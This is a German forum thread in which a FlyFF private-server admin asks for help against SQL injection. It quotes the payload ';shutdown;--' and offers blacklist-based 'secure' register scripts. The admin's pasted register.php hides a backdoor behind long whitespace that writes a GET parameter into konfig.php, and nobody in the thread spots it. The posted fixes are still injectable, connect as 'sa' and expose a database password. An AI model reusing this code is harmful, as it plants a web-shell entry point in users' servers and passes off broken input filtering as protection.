[FlyFF] xampp/datenbank

[Pumba[GM]]

Hallo FlyFF'ler

Könntet ihr mir helfen?

Ein alter kumpel(feind) hat einen profi hacker auf meinen server losgeschickt!

Er kann die datenbank ausschalten aber ganz kapput kann er sie nicht machen da ich shcon ein xampp antihack code von Jusikid.

Aber er kann die datenbank verbindung brechen.

mfg. Pumba[GM]

[Sedrika]

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

[マリブ]

Quote:

Originally Posted by Sedrika

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

Nicht nur du lachst ;>


Such dir nen SQL Injection sicheres Register Script ;>

[Pumba[GM]]

Ey nein der is ein Profi hacker nicht nur das macht er sry für das...

Aber der versucht die ganze zeit so du zu tun....

Quote:

Originally Posted by Sedrika

Er ist kein profi hacker xD dein / euer register script ist unsicher und man kann da dann ';shutdown;-- benutzen, womit die DB connection getrennt wird.

Pro hacker xD ich lach grad.

Wo bekommt man ein gutes her?

mfg. Pumba[GM]

[Kindergarten]

sei froh das er nur shutdown macht^^

Code:

$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);

$username = $_POST['user'];
$password = $_POST['pass'];

$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);

Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg

[Pumba[GM]]

Quote:

Originally Posted by Kindergarten

sei froh das er nur shutdown macht^^

Code:

$nicht_erlaubt = array(
'/\'/' => '',
'/\;/' => '',
'/\-/' => '',
'/\"/' => ''
);

$username = $_POST['user'];
$password = $_POST['pass'];

$username = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $username);
$password = preg_replace (array_keys($nicht_erlaubt), array_values($nicht_erlaubt), $password);

Kleine Gedankenhilfe, Ich geb dir hier jetzt mal kein komplettes Script sonst ist der Selbsthilfelerneffekt weg

Ich liebe dich ♥♥♥

eine bitte hätte ich wo genau muss ich das einfügen ? könntest du mir das einfügen und das neu eingefügte in rot makieren? thx. wäre echt nett.

 Spoiler

Code:

<?php                                                                                                                                                         if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
        function doesUsernameExist($name){
            $exit = FALSE;
            $result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
            if (mssql_num_rows($result) != 0){
                $exit = TRUE;
            }
            return $exit;
        }

        if(isset($_POST['submit'])){
            $user = preg_replace ("[^A-Za-z0-4]", "", $_POST['username']);
            $pass = preg_replace ("[^A-Za-z0-4]", "", $_POST['password']);
            if($_POST['username'] == ""){
                echo '<font color="red">Enter a user.</font><br /><br />';
            }
            else if($_POST['password'] == ""){
                        echo '<font color="red">Enter a password.</font><br /><br />';
            }
            else if ((strlen($_POST['username']) > 10) || (strlen($_POST['username']) < 3)){
                        echo '<font color="red">The user should be 3 to 10 characters.</font><br /><br />';
            }
            else if ((strlen($_POST['password']) > 10) || (strlen($_POST['password']) < 3)){
                        echo '<font color="red">The password should be 3 to 10 characters.</font><br /><br />';
            }
            else if($_POST['username'] != $user){
                        echo '<font color="red">User with invalid characters.</font><br /><br />';
            }
            else if($_POST['password'] != $pass){
                        echo '<font color="red">Password with invalid characters.</font><br /><br />';
            }
            else {
                        $pass = md5('kikugalanet' . $pass);
            if(!doesUsernameExist($user)){
                $stmt = mssql_init('webCreateAcc', $link);
                mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
                mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
                mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
                mssql_execute($stmt) or die ("Something is wrong on the execution");
                mssql_free_statement($stmt);
                                echo '<font color="Green">Dein Account wurde erfolgreich erstellt.</font><br /><br />';
            }
            else {
                                echo '<font color="red">User already Exist.</font><br /><br />';
            }
        }
                mssql_close();
    }

        echo '<form action="#" method="post">';
        echo 'Username: <br><input type="text" name="username" /><br />';
        echo 'Password: <br><input type="password" name="password" /><br />';
        echo '<br><input type="submit" name="submit" value="Register" />';
        echo '</form>';

?>

mfg. Pumba[GM]

[マリブ]

Try this ~

 Spoiler

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}

/*end clear $_COOKIE */
fclose ($fp);
?>


<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}





if(isset($_POST['submit']))
{
$server = "SQLEXPRESS";
$user = "sa";
$pass= "";


$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}



################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");




if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{


?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

[Pumba[GM]]

Quote:

Originally Posted by Balancex3

Try this ~

 Spoiler

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}

/*end clear $_COOKIE */
fclose ($fp);
?>


<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}





if(isset($_POST['submit']))
{
$server = "SQLEXPRESS";
$user = "sa";
$pass= "";


$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}



################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");




if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{


?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

Habe das jetzt so gemacht:

 Spoiler

Code:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("l dS of F Y h:i:s A");
$script = $_SERVER[PATH_TRANSLATED];
$fp = fopen ("[WEB]SQL_Injection.txt", "a+");
$sql_inject_1 = array(";","'","%",'"'); #Whoth need replace
$sql_inject_2 = array("", "","","""); #To wont replace
$GET_KEY = array_keys($_GET); #array keys from $_GET
$POST_KEY = array_keys($_POST); #array keys from $_POST
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE
/*begin clear $_GET */
for($i=0;$i<count($GET_KEY);$i++)
{
$real_get[$i] = $_GET[$GET_KEY[$i]];
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]]));
if($real_get[$i] != $_GET[$GET_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: GET\r\n");
fwrite ($fp, "Value: $real_get[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_GET */
/*begin clear $_POST */
for($i=0;$i<count($POST_KEY);$i++)
{
$real_post[$i] = $_POST[$POST_KEY[$i]];
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]]));
if($real_post[$i] != $_POST[$POST_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: POST\r\n");
fwrite ($fp, "Value: $real_post[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}
/*end clear $_POST */
/*begin clear $_COOKIE */
for($i=0;$i<count($COOKIE_KEY);$i++)
{
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]];
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]]));
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]])
{
fwrite ($fp, "IP: $ip\r\n");
fwrite ($fp, "Method: COOKIE\r\n");
fwrite ($fp, "Value: $real_cookie[$i]\r\n");
fwrite ($fp, "Script: $script\r\n");
fwrite ($fp, "Time: $time\r\n");
fwrite ($fp, "==================================\r\n");
}
}

/*end clear $_COOKIE */
fclose ($fp);
?>


<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}





if(isset($_POST['submit']))
{
$server = "[COLOR="Red"]KEVIN-PC/SQLEXPRESS[/COLOR]";
$user = "[COLOR="Red"]sa[/COLOR]";
$pass= "[COLOR="Red"]flyforfun[/COLOR]";


$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passwˆrter stimmen nich ¸berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enthält unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enthält unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}



################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");




if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{


?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td>&nbsp;</td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

Rot makiert was ich bis jetzt geändert habe.
wenn ich was noch ändern muss makier es rot pls thx.

mgf. Pumba[GM]

[Achileus]

Quote:

Originally Posted by Balancex3

Nicht nur du lachst ;>


Such dir nen SQL Injection sicheres Register Script ;>

Made my Day...

Wenn das pro sein soll dann bin ich Gott .

[マリブ]

Quote:

Originally Posted by Achileus

Made my Day...

Wenn das pro sein soll dann bin ich Gott .

Wenn du mich meinst damit, fail ~